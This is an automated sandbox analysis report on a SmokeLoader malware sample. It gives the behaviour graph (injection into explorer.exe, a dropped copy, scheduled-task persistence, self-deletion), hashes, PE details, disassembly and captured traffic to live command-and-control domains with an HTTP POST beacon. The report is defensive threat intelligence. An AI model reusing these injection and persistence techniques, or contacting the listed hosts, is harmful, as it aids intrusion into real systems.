                    Process Injection
                    11
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium1
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Exploitation for Client Execution
                    Boot or Logon Initialization Scripts1
                    DLL Side-Loading
                    12
                    Virtualization/Sandbox Evasion
                    LSASS Memory221
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                    Non-Application Layer Protocol
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)512
                    Process Injection
                    Security Account Manager12
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration112
                    Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                    Hidden Files and Directories
                    NTDS2
                    Process Discovery
                    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Obfuscated Files or Information
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    DLL Side-Loading
                    Cached Domain Credentials4
                    System Information Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    File Deletion
                    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 652394 Sample: p3jNeWT0GE.exe Startdate: 26/06/2022 Architecture: WINDOWS Score: 100 30 Multi AV Scanner detection for domain / URL 2->30 32 Antivirus detection for URL or domain 2->32 34 Yara detected SmokeLoader 2->34 36 2 other signatures 2->36 7 p3jNeWT0GE.exe 2->7         started        10 hdgaecu 2->10         started        process3 signatures4 46 Contains functionality to inject code into remote processes 7->46 48 Injects a PE file into a foreign processes 7->48 12 p3jNeWT0GE.exe 7->12         started        50 Machine Learning detection for dropped file 10->50 15 hdgaecu 10->15         started        process5 signatures6 52 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->52 54 Maps a DLL or memory area into another process 12->54 56 Checks if the current machine is a virtual machine (disk enumeration) 12->56 17 explorer.exe 2 12->17 injected 58 Creates a thread in another existing process (thread injection) 15->58 process7 dnsIp8 26 host-file-host6.com 47.89.255.79, 49800, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 17->26 28 host-host-file8.com 17->28 22 C:\Users\user\AppData\Roaming\hdgaecu, PE32 17->22 dropped 24 C:\Users\user\...\hdgaecu:Zone.Identifier, ASCII 17->24 dropped 38 System process connects to network (likely due to code injection or exploit) 17->38 40 Benign windows process drops PE files 17->40 42 Deletes itself after installation 17->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->44 file9 signatures10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    p3jNeWT0GE.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\hdgaecu100%Joe Sandbox ML
                    SourceDetectionScannerLabelLinkDownload
                    1.0.p3jNeWT0GE.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    0.2.p3jNeWT0GE.exe.c215a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    13.0.hdgaecu.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    13.0.hdgaecu.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    12.2.hdgaecu.c215a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    1.2.p3jNeWT0GE.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    1.0.p3jNeWT0GE.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    13.2.hdgaecu.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    1.0.p3jNeWT0GE.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    13.0.hdgaecu.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    SourceDetectionScannerLabelLink
                    host-file-host6.com18%VirustotalBrowse
                    host-host-file8.com13%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://ns.adobY0%URL Reputationsafe
                    http://host-file-host6.com/0%URL Reputationsafe
                    http://host-host-file8.com/100%URL Reputationmalware
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    host-file-host6.com
                    47.89.255.79
                    truetrueunknown
                    host-host-file8.com
                    unknown
                    unknowntrueunknown
                    NameMaliciousAntivirus DetectionReputation
                    http://host-file-host6.com/true
                    • URL Reputation: safe
                    unknown
                    http://host-host-file8.com/true
                    • URL Reputation: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://ns.adobYexplorer.exe, 00000004.00000000.397114425.00000000026D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.374277431.00000000026D0000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    47.89.255.79
                    host-file-host6.comUnited States
                    45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                    Joe Sandbox Version:35.0.0 Citrine
                    Analysis ID:652394
                    Start date and time: 26/06/202209:43:282022-06-26 09:43:28 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 7m 43s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:p3jNeWT0GE.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:20
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@6/2@5/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 78.9% (good quality ratio 69.7%)
                    • Quality average: 57.7%
                    • Quality standard deviation: 32.1%
                    HCA Information:
                    • Successful, ratio: 70%
                    • Number of executed functions: 18
                    • Number of non-executed functions: 2
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Adjust boot time
                    • Enable AMSI
                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Not all processes where analyzed, report is missing behavior information
                    TimeTypeDescription
                    09:45:40Task SchedulerRun new task: Firefox Default Browser Agent 48F1ADA0A38E1F04 path: C:\Users\user\AppData\Roaming\hdgaecu
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    47.89.255.79zEJJi06BWy.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    EaaksFFZMp.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    host-file-host6.comzEJJi06BWy.exeGet hashmaliciousBrowse
                    • 47.89.255.79
                    EaaksFFZMp.exeGet hashmaliciousBrowse
                    • 47.89.255.79
                    8hR2FFNS7r.exeGet hashmaliciousBrowse
                    • 91.203.193.195
                    OX2FmbvkaC.exeGet hashmaliciousBrowse
                    • 34.154.65.119
                    slssK34fz6.exeGet hashmaliciousBrowse
                    • 185.251.88.123
                    ektmWnad6Q.exeGet hashmaliciousBrowse
                    • 185.251.88.123
                    s1HJbiWClx.exeGet hashmaliciousBrowse
                    • 185.251.88.123
                    Zin2QMKoyr.exeGet hashmaliciousBrowse
                    • 34.175.118.32
                    CusuNTi14y.exeGet hashmaliciousBrowse
                    • 34.175.118.32
                    1ky2gk6Aon.exeGet hashmaliciousBrowse
                    • 34.175.118.32
                    IoSHLr6wUf.exeGet hashmaliciousBrowse
                    • 34.175.118.32
                    Dx26Me4rxX.exeGet hashmaliciousBrowse
                    • 34.175.118.32
                    NMK0z8gjZD.exeGet hashmaliciousBrowse
                    • 34.175.118.32
                    ABp48PkUGn.exeGet hashmaliciousBrowse
                    • 34.175.118.32
                    4rid9Pr9Ei.exeGet hashmaliciousBrowse
                    • 34.175.118.32
                    OVxyYcJ7a0.exeGet hashmaliciousBrowse
                    • 34.175.118.32
                    beFtjvNZq1.exeGet hashmaliciousBrowse
                    • 34.175.118.32
                    QceK9Nkj3I.exeGet hashmaliciousBrowse
                    • 34.175.118.32
                    dPC9EnexYI.exeGet hashmaliciousBrowse
                    • 34.175.118.32
                    LzPKhJRnJc.exeGet hashmaliciousBrowse
                    • 34.175.118.32
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCsora.armGet hashmaliciousBrowse
                    • 47.91.26.144
                    zEJJi06BWy.exeGet hashmaliciousBrowse
                    • 47.89.255.79
                    EaaksFFZMp.exeGet hashmaliciousBrowse
                    • 47.89.255.79
                    DOC098765567887.exeGet hashmaliciousBrowse
                    • 47.243.174.176
                    oesJv1hdmcGet hashmaliciousBrowse
                    • 8.213.113.97
                    RequestXSheet.docxGet hashmaliciousBrowse
                    • 8.218.122.14
                    meerkat.x86Get hashmaliciousBrowse
                    • 8.222.164.81
                    sora.armGet hashmaliciousBrowse
                    • 47.90.47.158
                    b4NeCugKMR.exeGet hashmaliciousBrowse
                    • 8.218.52.133
                    arm7Get hashmaliciousBrowse
                    • 47.253.41.26
                    SecuriteInfo.com.IL.Trojan.MSILZilla.20968.21798.exeGet hashmaliciousBrowse
                    • 47.252.40.77
                    arm7Get hashmaliciousBrowse
                    • 47.254.80.129
                    NFqeiFXp7yGet hashmaliciousBrowse
                    • 47.255.177.114
                    tXbUvBRrf2Get hashmaliciousBrowse
                    • 8.221.161.114
                    7myCS48Y2sGet hashmaliciousBrowse
                    • 47.252.184.30
                    TNTINVOICE.exeGet hashmaliciousBrowse
                    • 47.243.104.253
                    Emoji Design Keyboard.apkGet hashmaliciousBrowse
                    • 149.129.200.44
                    Emoji Design Keyboard.apkGet hashmaliciousBrowse
                    • 149.129.200.44
                    Emoji Design Keyboard_35.626.5.apkGet hashmaliciousBrowse
                    • 149.129.200.44
                    Emoji Design Keyboard_35.626.5.apkGet hashmaliciousBrowse
                    • 149.129.200.44
                    No context
                    No context
                    Process:C:\Windows\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):293376
                    Entropy (8bit):6.884791106060294
                    Encrypted:false
                    SSDEEP:6144:HShclg/jkSrmFybCvqYNOpd5I165kcpe1+JAtGI8E2lxiz:yClIlmFO4qYNGI45kM2+JAtdyni
                    MD5:25B54F50600604A53E80163B9049421E
                    SHA1:BE28D831C5183368F057F8BEC104A2B0BABB406C
                    SHA-256:9904784C707ABB24585E3E61FA5CC094380206385CBB7D087C968D7DC5EE0991
                    SHA-512:3CBE8FAB28D77F7E7477C31DD3FC69E930FD3BE72B20411CC077592440E6EA487D3EDA66EBACE44C0C58FD35A9FC1AE5F1C3FB563FFAE33658930525DCB69027
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-\..i=..i=..i=...r..h=..wo..v=..wo...=..N...j=..i=...=..wo..V=..wo..h=..wo..h=..Richi=..........................PE..L......`......................p..............0....@...........................s.....(@..........................................(....`s..?..........................P..................................@............................................text............................... ..`.data.....p..0......................@....zineha.K....@s......6..............@....cixu...J....Ps......8..............@....rsrc....?...`s..@...:..............@..@........................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\explorer.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.884791106060294
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:p3jNeWT0GE.exe
                    File size:293376
                    MD5:25b54f50600604a53e80163b9049421e
                    SHA1:be28d831c5183368f057f8bec104a2b0babb406c
                    SHA256:9904784c707abb24585e3e61fa5cc094380206385cbb7d087c968d7dc5ee0991
                    SHA512:3cbe8fab28d77f7e7477c31dd3fc69e930fd3be72b20411cc077592440e6ea487d3eda66ebace44c0c58fd35a9fc1ae5f1c3fb563ffae33658930525dcb69027
                    SSDEEP:6144:HShclg/jkSrmFybCvqYNOpd5I165kcpe1+JAtGI8E2lxiz:yClIlmFO4qYNGI45kM2+JAtdyni
                    TLSH:32549E10B650C434F5F712F44ABA926CB63E7AA19B3491CF62D56AEE5B346E0EC31307
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-\..i=..i=..i=...r..h=..wo..v=..wo...=..N...j=..i=...=..wo..V=..wo..h=..wo..h=..Richi=..........................PE..L......`...
                    Icon Hash:aecaae9ecea62ea2
                    Entrypoint:0x40eec0
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:TERMINAL_SERVER_AWARE
                    Time Stamp:0x608DF612 [Sun May 2 00:45:06 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:0
                    File Version Major:5
                    File Version Minor:0
                    Subsystem Version Major:5
                    Subsystem Version Minor:0
                    Import Hash:9708e7dbb84fb2e34dfb5e05eada89dd
                    Instruction
                    mov edi, edi
                    push ebp
                    mov ebp, esp
                    call 00007F93ECC81C1Bh
                    call 00007F93ECC74586h
                    pop ebp
                    ret
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    mov edi, edi
                    push ebp
                    mov ebp, esp
                    push FFFFFFFEh
                    push 00430CA0h
                    push 00412510h
                    mov eax, dword ptr fs:[00000000h]
                    push eax
                    add esp, FFFFFF94h
                    push ebx
                    push esi
                    push edi
                    mov eax, dword ptr [0044387Ch]
                    xor dword ptr [ebp-08h], eax
                    xor eax, ebp
                    push eax
                    lea eax, dword ptr [ebp-10h]
                    mov dword ptr fs:[00000000h], eax
                    mov dword ptr [ebp-18h], esp
                    mov dword ptr [ebp-70h], 00000000h
                    mov dword ptr [ebp-04h], 00000000h
                    lea eax, dword ptr [ebp-60h]
                    push eax
                    call dword ptr [004010DCh]
                    mov dword ptr [ebp-04h], FFFFFFFEh
                    jmp 00007F93ECC74598h
                    mov eax, 00000001h
                    ret
                    mov esp, dword ptr [ebp-18h]
                    mov dword ptr [ebp-78h], 000000FFh
                    mov dword ptr [ebp-04h], FFFFFFFEh
                    mov eax, dword ptr [ebp-78h]
                    jmp 00007F93ECC746C8h
                    mov dword ptr [ebp-04h], FFFFFFFEh
                    call 00007F93ECC74704h
                    mov dword ptr [ebp-6Ch], eax
                    push 00000001h
                    call 00007F93ECC82CDAh
                    add esp, 04h
                    test eax, eax
                    jne 00007F93ECC7457Ch
                    push 0000001Ch
                    call 00007F93ECC746BCh
                    add esp, 04h
                    call 00007F93ECC7C304h
                    test eax, eax
                    jne 00007F93ECC7457Ch
                    push 00000010h
                    Programming Language:
                    • [ASM] VS2008 build 21022
                    • [ C ] VS2008 build 21022
                    • [IMP] VS2005 build 50727
                    • [C++] VS2008 build 21022
                    • [RES] VS2008 build 21022
                    • [LNK] VS2008 build 21022
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x313bc0x28.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x7360000x3f98.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x13500x1c.text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb2f00x40.text
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x2fc.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x315ac0x31600False0.45167128164556963data6.39681715338854IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .data0x330000x700da80x11c00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .zineha0x7340000x4b0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .cixu0x7350000x4a0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x7360000x3f980x4000False0.73095703125data6.341519681079148IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountry
                    RT_ICON0x7361f00x25a8dataKoreanNorth Korea
                    RT_ICON0x7361f00x25a8dataKoreanSouth Korea
                    RT_ICON0x7387980x10a8dataKoreanNorth Korea
                    RT_ICON0x7387980x10a8dataKoreanSouth Korea
                    RT_STRING0x7399180x42dataKoreanNorth Korea
                    RT_STRING0x7399180x42dataKoreanSouth Korea
                    RT_STRING0x7399600x4aedataKoreanNorth Korea
                    RT_STRING0x7399600x4aedataKoreanSouth Korea
                    RT_STRING0x739e100x188dataKoreanNorth Korea
                    RT_STRING0x739e100x188dataKoreanSouth Korea
                    RT_ACCELERATOR0x7398a80x70dataKoreanNorth Korea
                    RT_ACCELERATOR0x7398a80x70dataKoreanSouth Korea
                    RT_ACCELERATOR0x7398680x40dataKoreanNorth Korea
                    RT_ACCELERATOR0x7398680x40dataKoreanSouth Korea
                    RT_GROUP_ICON0x7398400x22dataKoreanNorth Korea
                    RT_GROUP_ICON0x7398400x22dataKoreanSouth Korea
                    DLLImport
                    KERNEL32.dllDebugBreakProcess, FindFirstChangeNotificationW, GetNamedPipeHandleStateW, CreateIoCompletionPort, FillConsoleOutputCharacterW, DisableThreadLibraryCalls, TerminateProcess, GetProcessId, VerifyVersionInfoW, EnumDateFormatsW, FindNextFileW, CopyFileExA, BuildCommDCBAndTimeoutsA, VirtualUnlock, WriteProfileStringW, VerifyVersionInfoA, SetProcessPriorityBoost, GetDriveTypeW, FindFirstChangeNotificationA, GetFileType, DeleteFileA, FindNextVolumeMountPointA, OutputDebugStringA, ResetWriteWatch, WriteConsoleInputA, WriteConsoleInputW, GetConsoleTitleW, SetComputerNameExW, SetTimeZoneInformation, LoadLibraryA, GetSystemDirectoryA, GetDriveTypeA, GetShortPathNameW, ActivateActCtx, GetProfileSectionA, DeleteFileW, GetCommandLineW, InterlockedIncrement, AddRefActCtx, FindResourceA, FormatMessageA, GetModuleFileNameW, CreateJobObjectW, InitializeCriticalSection, SetFirmwareEnvironmentVariableW, GetDllDirectoryW, GetExitCodeThread, WritePrivateProfileStringW, GetConsoleAliasesLengthW, WriteProfileSectionW, AddAtomA, InterlockedDecrement, GetVersionExA, HeapSize, _hwrite, GetStartupInfoA, DisconnectNamedPipe, GetCPInfoExW, GetSystemWow64DirectoryW, GetPrivateProfileIntA, GetConsoleAliasExesW, DebugBreak, EndUpdateResourceW, SetLastError, InterlockedExchangeAdd, GetStringTypeExW, DeleteVolumeMountPointW, OpenFileMappingA, SetDefaultCommConfigW, lstrcpyA, TerminateThread, GetACP, _lwrite, GetQueuedCompletionStatus, GetNamedPipeHandleStateA, GetDiskFreeSpaceExW, RemoveVectoredExceptionHandler, WriteConsoleW, VirtualProtect, ReadConsoleOutputW, SetThreadContext, BuildCommDCBA, ReleaseActCtx, GetHandleInformation, WritePrivateProfileSectionW, DeleteCriticalSection, GetFileAttributesA, OpenWaitableTimerW, GetVolumePathNameW, SetConsoleMode, HeapSetInformation, SetComputerNameA, FindNextFileA, SetEvent, UnlockFile, GetProcAddress, DeleteTimerQueueTimer, CopyFileW, MoveFileA, GlobalAlloc, GetCommMask, SetFileShortNameA, GetFileAttributesW, FreeEnvironmentStringsW, GetProfileStringA, GetConsoleTitleA, SetComputerNameW, GetConsoleAliasesW, CreateMailslotA, EnumDateFormatsA, GetTimeZoneInformation, SetConsoleOutputCP, GetFileInformationByHandle, SetLocalTime, CallNamedPipeA, GetConsoleAliasExesLengthW, GetCurrentActCtx, OpenSemaphoreW, GetModuleHandleExA, LoadLibraryW, FoldStringW, GetTickCount, GetConsoleAliasesLengthA, GetLastError, LocalUnlock, GetFileTime, EnumResourceNamesW, OpenFileMappingW, UnhandledExceptionFilter, GetCompressedFileSizeW, GetThreadPriority, ReadConsoleA, AssignProcessToJobObject, Sleep, EnterCriticalSection, LeaveCriticalSection, RaiseException, RtlUnwind, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, WideCharToMultiByte, GetCommandLineA, HeapValidate, IsBadReadPtr, GetModuleHandleA, TlsGetValue, GetModuleHandleW, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, GetStdHandle, WriteFile, OutputDebugStringW, ExitProcess, GetOEMCP, GetCPInfo, IsValidCodePage, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, HeapDestroy, HeapCreate, HeapFree, VirtualFree, FlushFileBuffers, GetConsoleCP, GetConsoleMode, HeapAlloc, HeapReAlloc, VirtualAlloc, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, LCMapStringA, LCMapStringW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, SetFilePointer, CloseHandle, CreateFileA
                    Language of compilation systemCountry where language is spokenMap
                    KoreanNorth Korea
                    KoreanSouth Korea
                    TimestampSource PortDest PortSource IPDest IP
                    Jun 26, 2022 09:45:40.786709070 CEST4980080192.168.2.747.89.255.79
                    Jun 26, 2022 09:45:40.966763973 CEST804980047.89.255.79192.168.2.7
                    Jun 26, 2022 09:45:40.966864109 CEST4980080192.168.2.747.89.255.79
                    Jun 26, 2022 09:45:40.966998100 CEST4980080192.168.2.747.89.255.79
                    Jun 26, 2022 09:45:40.967025042 CEST4980080192.168.2.747.89.255.79
                    Jun 26, 2022 09:45:41.150403023 CEST804980047.89.255.79192.168.2.7
                    Jun 26, 2022 09:45:41.516522884 CEST804980047.89.255.79192.168.2.7
                    Jun 26, 2022 09:45:41.516628981 CEST4980080192.168.2.747.89.255.79
                    Jun 26, 2022 09:45:41.526240110 CEST4980080192.168.2.747.89.255.79
                    Jun 26, 2022 09:45:41.707974911 CEST804980047.89.255.79192.168.2.7
                    TimestampSource PortDest PortSource IPDest IP
                    Jun 26, 2022 09:45:40.467047930 CEST5182453192.168.2.78.8.8.8
                    Jun 26, 2022 09:45:40.779170990 CEST53518248.8.8.8192.168.2.7
                    Jun 26, 2022 09:45:41.537991047 CEST6521453192.168.2.78.8.8.8
                    Jun 26, 2022 09:45:42.543178082 CEST6521453192.168.2.78.8.8.8
                    Jun 26, 2022 09:45:43.574409962 CEST6521453192.168.2.78.8.8.8
                    Jun 26, 2022 09:45:45.621850967 CEST6521453192.168.2.78.8.8.8
                    Jun 26, 2022 09:45:45.624289036 CEST53652148.8.8.8192.168.2.7
                    Jun 26, 2022 09:45:46.609745979 CEST53652148.8.8.8192.168.2.7
                    Jun 26, 2022 09:45:47.613452911 CEST53652148.8.8.8192.168.2.7
                    Jun 26, 2022 09:45:49.680742979 CEST53652148.8.8.8192.168.2.7
                    TimestampSource IPDest IPChecksumCodeType
                    Jun 26, 2022 09:45:46.609853983 CEST192.168.2.78.8.8.8cffa(Port unreachable)Destination Unreachable
                    Jun 26, 2022 09:45:47.613527060 CEST192.168.2.78.8.8.8cffa(Port unreachable)Destination Unreachable
                    Jun 26, 2022 09:45:49.680871010 CEST192.168.2.78.8.8.8cffa(Port unreachable)Destination Unreachable
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Jun 26, 2022 09:45:40.467047930 CEST192.168.2.78.8.8.80x7150Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:41.537991047 CEST192.168.2.78.8.8.80xae74Standard query (0)host-host-file8.comA (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:42.543178082 CEST192.168.2.78.8.8.80xae74Standard query (0)host-host-file8.comA (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:43.574409962 CEST192.168.2.78.8.8.80xae74Standard query (0)host-host-file8.comA (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:45.621850967 CEST192.168.2.78.8.8.80xae74Standard query (0)host-host-file8.comA (IP address)IN (0x0001)
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Jun 26, 2022 09:45:40.779170990 CEST8.8.8.8192.168.2.70x7150No error (0)host-file-host6.com47.89.255.79A (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:45.624289036 CEST8.8.8.8192.168.2.70xae74Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:46.609745979 CEST8.8.8.8192.168.2.70xae74Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:47.613452911 CEST8.8.8.8192.168.2.70xae74Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:49.680742979 CEST8.8.8.8192.168.2.70xae74Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)
                    • xcxakxdec.net
                      • host-file-host6.com
                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.74980047.89.255.7980C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Jun 26, 2022 09:45:40.966998100 CEST1413OUTPOST / HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://xcxakxdec.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 282
                    Host: host-file-host6.com
